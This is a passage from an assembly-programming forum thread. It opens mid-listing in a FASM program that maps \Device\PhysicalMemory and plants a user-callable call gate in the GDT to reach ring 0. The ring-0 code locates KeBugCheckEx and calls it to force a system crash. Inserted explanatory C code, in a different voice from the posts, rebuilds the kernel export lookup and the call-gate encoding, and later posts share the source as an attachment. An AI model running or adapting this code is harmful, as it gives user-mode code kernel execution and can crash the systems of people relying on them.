        add             esi, SYSTEM_MODULE_SIZE
        dec             ebx
        jns             .1

        ; umm.. ntoskrnl not found - quite unlikely to happen ;]
        invoke          MessageBox, 0, e_ntos, 0, 0
        invoke          ExitProcess, 2
;--------------------------------------------------------------------
; substitute for MmGetPhysicalAddress - not always ok, but for this purpose sufficient
; input: linear address in eax
GetPhysicalAddress:
        cmp             eax, 80000000h
        jae             .1
        cmp             eax, 0A0000000h
        jb                      .1
        and             eax, 0FFFF000h
        ret
.1:
        and             eax, 1FFFF000h
        ret
;--------------------------------------------------------------------
; maps physical memory through the \Device\PhysicalMemory section opened in [mem_section]
; input:  base = linear address inside the kernel window, size = bytes wanted, access_mode = PAGE_* protection
; output: [map_base] = user-mode pointer to `base'; [phys_address]/[mapped_size] describe the whole view
; clobbers ebx, esi, edi

proc            MapMemory, base, size, access_mode
        mov             eax, [base]                     ; address
        xor             edx, edx
        push            eax
        div             dword [sys_info+SYSTEM_INFO.dwAllocationGranularity]    ; edx = offset inside the 64K granule
        mov             edi, edx
        pop             eax
        mov             ebx, [size]                     ; size
        inc             ebx
        mov             esi, ebx                        ; mapped size = size+1 plus the offset we back up by
        add             esi, edi
        sub             eax, edi                        ; section offset must be granularity aligned
        call            GetPhysicalAddress
        mov             [phys_address], eax             ; low dword of the LARGE_INTEGER offset; high dword stays 0
        mov             [mapped_size], esi
        mov             dword [map_base], 0             ; let the kernel choose the view address (a stale, unaligned value here fails the call)
        mov             eax, [mem_section]
        invoke          NtMapViewOfSection, eax, -1, map_base, 0, esi, phys_address, mapped_size, 1, 0, [access_mode]   ; -1 = current process, 1 = ViewShare
        stdcall         NtErrorTest, e_maps
        add             [map_base], edi                 ; point at the requested address inside the view
        ret
endp
;--------------------------------------------------------------------

; NtErrorTest - eax = NTSTATUS of a native call; STATUS_SUCCESS is 0, anything else is treated as failure
proc    NtErrorTest, er_msg
        test            eax, eax
        jz              .ok
        invoke          wsprintf, txtbuf, f_err, [er_msg], eax
        invoke          MessageBox, 0, txtbuf, m_caption, MB_ICONWARNING
        invoke          NtClose, [mem_section]
        invoke          ExitProcess, 1
.ok:
        ret
endp
;--------------------------------------------------------------------
; ErrorTest - eax = BOOL/handle style result; zero means failure, the code comes from GetLastError

proc    ErrorTest, e_msg
        test            eax, eax
        jnz             .ok
        invoke          GetLastError                    ; must go through the import table (`call [GetLastError]'), not `call GetLastError'
        invoke          wsprintf, txtbuf, f_err, [e_msg], eax
        invoke          MessageBox, 0, txtbuf, m_caption, MB_ICONWARNING
        invoke          NtClose, [mem_section]
        invoke          ExitProcess, 1
.ok:
        ret
endp
;--------------------------------------------------------------------
; ErrorTestZ - eax = DWORD error code (GetSecurityInfo, SetEntriesInAcl, SetSecurityInfo style);
; zero means success and a non-zero eax already is the code, these APIs do not set the last-error value

proc    ErrorTestZ, e1_msg
        test            eax, eax
        jz              .ok
        invoke          wsprintf, txtbuf, f_err, [e1_msg], eax
        invoke          MessageBox, 0, txtbuf, m_caption, MB_ICONWARNING
        invoke          NtClose, [mem_section]
        invoke          ExitProcess, 1
.ok:
        ret
endp
;--------------------------------------------------------------------
; the real deal ;] - entered through the call gate, so this runs at ring 0
; stack on entry (gate with 1 dword parameter): [esp]=return EIP, [esp+4]=return CS,
; [esp+8]=copied parameter, [esp+12]=ring-3 ESP, [esp+16]=ring-3 SS
ring0_proc:
        cli
        mov             eax, [esp+8]                    ; param - ntoskrnl base

        push            ebx
        push            edx
        push            esi
        push            edi
; find KeBugCheckEx in exports
        mov             ebx, eax                        ; ebx = image base
        add             eax, [eax+0x3c]                 ; eax = IMAGE_NT_HEADERS (via e_lfanew)
        mov             edi, dword [eax+0x78]           ; DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress
        add             edi, ebx                        ; edi = IMAGE_EXPORT_DIRECTORY
        mov             esi, [edi+IMAGE_EXPORT_DIRECTORY.AddressOfNames]
        add             esi, ebx                        ; esi = table of name RVAs

        xor             edx, edx                        ; edx = name index
.name:
        mov             eax, [esi]
        add             eax, ebx                        ; eax = name string
        ; check function name: "KeBugCheckEx" plus its terminator
        cmp             dword [eax+00h], "KeBu"
        jne             .F
        cmp             dword [eax+04h], "gChe"
        jne             .F
        cmp             dword [eax+08h], "ckEx"
        jne             .F
        cmp             byte [eax+0Ch], 0
        jne             .F
        ; name index -> ordinal -> function RVA
        mov             eax, [edi+IMAGE_EXPORT_DIRECTORY.AddressOfOrdinals]
        add             eax, ebx
        movzx           esi, word [edx*2+eax]
        mov             eax, [edi+IMAGE_EXPORT_DIRECTORY.AddressOfFunctions]
        add             eax, ebx
        mov             esi, [esi*4+eax]
        add             esi, ebx                        ; esi = KeBugCheckEx
        jmp             .fnd
.F:
        add             esi, 4
        inc             edx
        cmp             edx, [edi+IMAGE_EXPORT_DIRECTORY.NumberOfNames]
        jne             .name
        xor             esi, esi                        ; not found: return 0 instead of calling a stray pointer
.fnd:
        mov             eax, esi

        pop             edi
        pop             esi
        pop             edx
        pop             ebx

;       int3
        test            eax, eax
        jz              .back
        stdcall         eax, 0xdeadbeef, 0xdead, 0xbeef, 0xcafe, 0xbabe   ; KeBugCheckEx does not return
.back:
        sti                                             ; retf does not restore EFLAGS, so re-enable interrupts ourselves
        retf 4                                          ; back to ring 3, dropping the copied gate parameter
ring0_end:

section '.bss' readable writeable
 gdt:                                                   ; 6-byte operand for sgdt
        gdt_limit               rw      1
        gdt_base                rd      1

        farcall                 rw      3               ; far pointer for the gate call: offset:32 (ignored by a call gate), selector:16
        txtbuf                  rb      4096
        mem_section             rd      1               ; handle to \Device\PhysicalMemory
        mapped_size             rd      1
        map_base                rd      1               ; view address returned by NtMapViewOfSection
        p_old_dacl              rd      1
        p_new_dacl              rd      1
        p_sec_descr             rd      1
        sys_info                SYSTEM_INFO             ; for dwAllocationGranularity
        ntoskrnl                rd      1
        align 4
        modinfo                 rb      SYSTEM_MODULE_INFORMATION_SIZE

        m_caption               db      "NT ring0 by Omega Red",0
        f_err                   db      "Error: %s, code: 0x%x",0
        e_opens1                db      "NtOpenSection for DACL access failed",0
        e_opens2                db      "NtOpenSection for r/w failed",0
        e_getsec                db      "GetSecurityInfo failed",0
        e_setacl                db      "SetEntriesInAclA failed",0
        e_setsec                db      "SetSecurityInfo failed",0
        e_maps                  db      "NtMapViewOfSection failed",0
        e_unmaps                db      "NtUnmapViewOfSection failed",0
        e_query                 db      "NtQuerySystemInformation failed",0
        e_ntos                  db      "ntoskrnl.exe module not found in memory!",0
        s_cur_user              db      "CURRENT_USER",0

        align 4
        ; 32-bit call gate descriptor (8 bytes); the two offset words are patched at run time
        callgate                dw      0                       ; offset bits 15..0
                                dw      8                       ; target code segment selector: #define KGDT_R0_CODE 8
                                dw      1110110000000001b       ; P=1, DPL=3 (callable from ring 3), S=0, type 1100b = 32-bit call gate, 1 dword parameter
                                dw      0                       ; offset bits 31..16

        align 4
        s_mem_dev_uni   du              "\Device\PhysicalMemory"        ; no terminator; Length below is in bytes

        mem_dev_uni_len equ     $-s_mem_dev_uni

        align 4
        mem_dev_name:           ; UNICODE_STRING
                                dw              mem_dev_uni_len         ; Length
                                dw              mem_dev_uni_len+2       ; MaximumLength
                                dd              s_mem_dev_uni           ; Buffer

        phys_address    dd      0,0                     ; LARGE_INTEGER section offset passed to NtMapViewOfSection

        align 4
        access:
        times   EXPLICIT_ACCESS_SIZE    db      0       ; EXPLICIT_ACCESS used for the DACL change

        align 4
        obj_attr:       dd              OBJECT_ATTRIBUTES_SIZE          ; Length
                                dd              0                               ; RootDirectory
                                dd              mem_dev_name                    ; ObjectName
                                dd              OBJ_CASE_INSENSITIVE OR OBJ_KERNEL_HANDLE       ; Attributes
                                dd              0                               ; SecurityDescriptor
                                dd              0                               ; SecurityQualityOfService

        ; one entry of the SystemModuleInformation array (284 bytes on 32-bit NT)
        struct SYSTEM_MODULE
                Reserved1               rd 1                            ; Section
                Reserved2               rd 1                            ; MappedBase
                ImageBaseAddress        rd 1
                ImageSize               rd 1                            ; bytes
                Flags                   rd 1
                Index                   rw 1                            ; LoadOrderIndex, zero based
                wRank                   rw 1                            ; InitOrderIndex, 0 if not assigned
                Unknown                 rw 1                            ; LoadCount
                ModuleNameOffset        rw 1                            ; offset of the file name part inside ImageName
                ImageName               rb MAXIMUM_FILENAME_LENGTH      ; full path, 256 bytes
        ends
Post 06 Mar 2006, 19:26
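The export lookup that ring0_proc in the post above performs on ntoskrnl.exe (e_lfanew, export directory at data directory slot 0, then name table, ordinal table and function table) is shown below in C as an added example; it is not code from the post or from the original program. It compares the whole name including the terminator, bounds-checks every RVA, and returns 0 when the name is absent, where the posted assembly would fall through with a stray pointer. The image it parses is a hand-built minimal 32-bit PE kept in a static buffer (constructed test data, not a real kernel image), and a little-endian host is assumed, as PE itself is.

```c
#include <stdint.h>
#include <string.h>
#include <stdio.h>

/* Offsets from the PE/COFF specification. */
#define OFF_E_LFANEW    0x3c        /* IMAGE_DOS_HEADER.e_lfanew */
#define OFF_EXPORT_DIR  0x78        /* IMAGE_NT_HEADERS32: DataDirectory[EXPORT].VirtualAddress */
#define PE_SIGNATURE    0x00004550u /* "PE\0\0" */
#define IMG_SIZE        0x300       /* size of the constructed test image */

/* IMAGE_EXPORT_DIRECTORY (40 bytes, no padding) */
typedef struct {
    uint32_t Characteristics, TimeDateStamp;
    uint16_t MajorVersion, MinorVersion;
    uint32_t Name, Base, NumberOfFunctions, NumberOfNames;
    uint32_t AddressOfFunctions, AddressOfNames, AddressOfNameOrdinals;
} ExportDirectory;

static uint32_t rd32(const uint8_t *p) { uint32_t v; memcpy(&v, p, 4); return v; }
static uint16_t rd16(const uint8_t *p) { uint16_t v; memcpy(&v, p, 2); return v; }
static void wr32(uint8_t *p, uint32_t v) { memcpy(p, &v, 4); }
static void wr16(uint8_t *p, uint16_t v) { memcpy(p, &v, 2); }

/* 1 if [rva, rva+len) lies inside an image of `size` bytes */
static int in_image(uint32_t rva, size_t len, size_t size)
{
    return rva <= size && len <= size - rva;
}

/* Returns the RVA of export `name`, or 0 if the image has no such export or
 * its headers are malformed.  image base + RVA is the callable address. */
uint32_t find_export_rva(const uint8_t *image, size_t size, const char *name)
{
    size_t name_len = strlen(name) + 1;                 /* compare the terminator too */
    if (!in_image(0, OFF_E_LFANEW + 4, size)) return 0;
    uint32_t nt = rd32(image + OFF_E_LFANEW);
    if (!in_image(nt, OFF_EXPORT_DIR + 8, size)) return 0;
    if (rd32(image + nt) != PE_SIGNATURE) return 0;

    uint32_t exp_rva = rd32(image + nt + OFF_EXPORT_DIR);
    if (exp_rva == 0 || !in_image(exp_rva, sizeof(ExportDirectory), size)) return 0;
    ExportDirectory ed;
    memcpy(&ed, image + exp_rva, sizeof ed);
    if (ed.NumberOfNames > size / 4 || ed.NumberOfFunctions > size / 4) return 0;
    if (!in_image(ed.AddressOfNames, (size_t)ed.NumberOfNames * 4, size) ||
        !in_image(ed.AddressOfNameOrdinals, (size_t)ed.NumberOfNames * 2, size) ||
        !in_image(ed.AddressOfFunctions, (size_t)ed.NumberOfFunctions * 4, size))
        return 0;

    for (uint32_t i = 0; i < ed.NumberOfNames; i++) {
        uint32_t name_rva = rd32(image + ed.AddressOfNames + 4 * i);
        if (!in_image(name_rva, name_len, size)) continue;
        if (memcmp(image + name_rva, name, name_len) != 0) continue;
        /* name index -> unbiased ordinal -> function RVA: the same three hops as ring0_proc */
        uint16_t ord = rd16(image + ed.AddressOfNameOrdinals + 2 * i);
        if (ord >= ed.NumberOfFunctions) return 0;
        return rd32(image + ed.AddressOfFunctions + 4 * ord);
    }
    return 0;                                           /* not exported by name */
}

static uint8_t g_image[IMG_SIZE];

/* Constructed test image (not a real kernel): DOS header at 0, NT headers at 0x80,
 * export directory at 0x200, function/name/ordinal tables at 0x240/0x250/0x260,
 * name strings from 0x280.  Names are stored sorted, as linkers emit them. */
const uint8_t *build_test_image(void)
{
    static const char *names[] = { "KeBugCheck", "KeBugCheckEx", "KeBugCheckExx" };
    static const uint16_t ordinals[] = { 0, 2, 1 };                   /* name i -> function slot */
    static const uint32_t functions[] = { 0x1000, 0x1100, 0x1200 };  /* function RVAs */
    ExportDirectory ed = {0};

    memset(g_image, 0, sizeof g_image);
    wr16(g_image, 0x5a4d);                              /* "MZ" */
    wr32(g_image + OFF_E_LFANEW, 0x80);
    wr32(g_image + 0x80, PE_SIGNATURE);
    wr32(g_image + 0x80 + OFF_EXPORT_DIR, 0x200);       /* export directory RVA */
    wr32(g_image + 0x80 + OFF_EXPORT_DIR + 4, 0x100);   /* export directory size */
    ed.Base = 1;
    ed.NumberOfFunctions = ed.NumberOfNames = 3;
    ed.AddressOfFunctions = 0x240;
    ed.AddressOfNames = 0x250;
    ed.AddressOfNameOrdinals = 0x260;
    memcpy(g_image + 0x200, &ed, sizeof ed);
    for (int i = 0; i < 3; i++) {
        uint32_t name_rva = 0x280 + 0x10 * i;
        wr32(g_image + 0x240 + 4 * i, functions[i]);
        wr32(g_image + 0x250 + 4 * i, name_rva);
        wr16(g_image + 0x260 + 2 * i, ordinals[i]);
        strcpy((char *)g_image + name_rva, names[i]);
    }
    return g_image;
}

int main(void)
{
    const uint8_t *img = build_test_image();
    printf("KeBugCheckEx  -> RVA 0x%x\n", find_export_rva(img, IMG_SIZE, "KeBugCheckEx"));   /* 0x1200 */
    printf("KeBugCheckExx -> RVA 0x%x\n", find_export_rva(img, IMG_SIZE, "KeBugCheckExx"));  /* 0x1100 */
    printf("NtNotThere    -> RVA 0x%x\n", find_export_rva(img, IMG_SIZE, "NtNotThere"));     /* 0 */
    return 0;
}
```

The "KeBugCheckExx" entry is there to show why the terminator matters: a 12-byte prefix compare like the posted one cannot tell it from "KeBugCheckEx" if it happens to come first in the name table. Against a real image you would pass the mapped module (or a file read with sections laid out at their virtual addresses) and its size, and add the image base to the returned RVA.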
okasvi
Joined: 18 Aug 2005
Posts: 382
Location: Finland
okasvi 06 Mar 2006, 22:42
OK, here it is, 4 KB in size. Somewhat ugly source, but I was just converting it to fasm without thinking about what it looks like...


Attachment: r0_fasm.asm (13.86 KB)
Description: notice two different parts of code to be executed in r0


_________________
When We Ride On Our Enemies
support reverse smileys |:
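The `callgate` descriptor in the source posted earlier in this thread is the piece that lets ring-3 code reach the ring-0 part: four words 0, 8, 1110110000000001b, 0. The C below is an added example, not code from the post or from r0_fasm.asm, that encodes and decodes a 32-bit call gate bit by bit (layout per the Intel SDM, vol. 3, "Call Gates") so that magic word can be checked field by field. The GDT slot number and the 0x00401000 offset used in main are assumptions for illustration only.

```c
#include <stdint.h>
#include <stdio.h>

#define GATE_TYPE_CALL32 0xCu   /* descriptor type 1100b: 32-bit call gate */

typedef struct {
    uint32_t offset;        /* entry point inside the target code segment */
    uint16_t selector;      /* target code segment; KGDT_R0_CODE = 8 on NT */
    uint8_t  dpl;           /* 3 = callable from ring 3 */
    uint8_t  param_count;   /* dwords copied from the caller's stack to the ring-0 stack */
    uint8_t  present;
} CallGate;

/* Descriptor layout:
 *   dword 0: selector[31:16] | offset[15:0]
 *   dword 1: offset[31:16] | P[15] | DPL[14:13] | S=0[12] | type[11:8] | 0[7:5] | param count[4:0] */
uint64_t callgate_encode(const CallGate *g)
{
    uint32_t lo = ((uint32_t)g->selector << 16) | (g->offset & 0xFFFFu);
    uint32_t hi = (g->offset & 0xFFFF0000u)
                | ((uint32_t)(g->present & 1) << 15)
                | ((uint32_t)(g->dpl & 3) << 13)
                | (GATE_TYPE_CALL32 << 8)
                | (g->param_count & 0x1Fu);
    return ((uint64_t)hi << 32) | lo;
}

/* Returns 0 and fills *g for a 32-bit call gate, -1 for any other descriptor
 * (S=1 segment descriptors and other gate types are rejected). */
int callgate_decode(uint64_t raw, CallGate *g)
{
    uint32_t lo = (uint32_t)raw, hi = (uint32_t)(raw >> 32);
    if (((hi >> 12) & 1) != 0 || ((hi >> 8) & 0xF) != GATE_TYPE_CALL32) return -1;
    g->offset      = (hi & 0xFFFF0000u) | (lo & 0xFFFFu);
    g->selector    = (uint16_t)(lo >> 16);
    g->present     = (uint8_t)((hi >> 15) & 1);
    g->dpl         = (uint8_t)((hi >> 13) & 3);
    g->param_count = (uint8_t)(hi & 0x1F);
    return 0;
}

/* Selector a ring-3 caller far-calls once the gate sits in GDT slot `index`
 * (assumed position): index << 3, TI = 0 (GDT), RPL = 3. */
uint16_t gate_selector(unsigned index) { return (uint16_t)((index << 3) | 3); }

/* The posted `callgate` words in memory order: 0, 8, 1110110000000001b (0EC01h), 0 */
uint64_t posted_descriptor(void)
{
    const uint16_t w[4] = { 0x0000, 0x0008, 0xEC01, 0x0000 };
    return (uint64_t)w[0] | (uint64_t)w[1] << 16 | (uint64_t)w[2] << 32 | (uint64_t)w[3] << 48;
}

/* 1 if the posted descriptor decodes to P=1, DPL=3, selector 8, offset 0, one parameter */
int posted_descriptor_is_ring3_gate(void)
{
    CallGate g;
    if (callgate_decode(posted_descriptor(), &g) != 0) return 0;
    return g.present == 1 && g.dpl == 3 && g.selector == 8 && g.offset == 0 && g.param_count == 1;
}

/* Patch the offset the way the posted code does at run time, then read it back;
 * returns 0xFFFFFFFF if the result no longer decodes as a call gate. */
uint32_t roundtrip_offset(uint32_t offset)
{
    CallGate g = { offset, 8, 3, 1, 1 }, back;
    if (callgate_decode(callgate_encode(&g), &back) != 0) return 0xFFFFFFFFu;
    return back.offset;
}

int main(void)
{
    CallGate g = { 0x00401000u, 8, 3, 1, 1 };    /* hypothetical address of the ring-0 routine */
    printf("posted descriptor  : %016llx (ring-3 callable gate: %d)\n",
           (unsigned long long)posted_descriptor(), posted_descriptor_is_ring3_gate());
    printf("with offset patched: %016llx, far-call selector for GDT slot 100: 0x%x\n",
           (unsigned long long)callgate_encode(&g), gate_selector(100));
    return 0;
}
```

Two details matter for the technique: DPL must be 3 or the far call from user mode faults with #GP, and the parameter count is what makes `[esp+8]` in the ring-0 routine hold the value the caller pushed, since the CPU copies that many dwords onto the ring-0 stack after the return CS:EIP.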
shism2
Joined: 14 Sep 2005
Posts: 248
shism2 06 Mar 2006, 22:49
asdfasdf


Attachment: PeLibrary-0.3c.zip (105.07 KB)

LocoDelAssembly
Your code has a bug
Joined: 06 May 2005
Posts: 4624
Location: Argentina
LocoDelAssembly 07 Mar 2006, 04:51
shism2, you still get the same problem because you created a new section but with the uninitialized data placed before the initialized data. You can fix it by adding a new section for uninitialized data (like okasvi), or:
LocoDelAssembly wrote:
if you put the data in a separate section, then you don't need to put the uninitialized data at the end of the source but at the end of the section, and the section can be placed anywhere.
Copyright © 1999-2025, Tomasz Grysztar.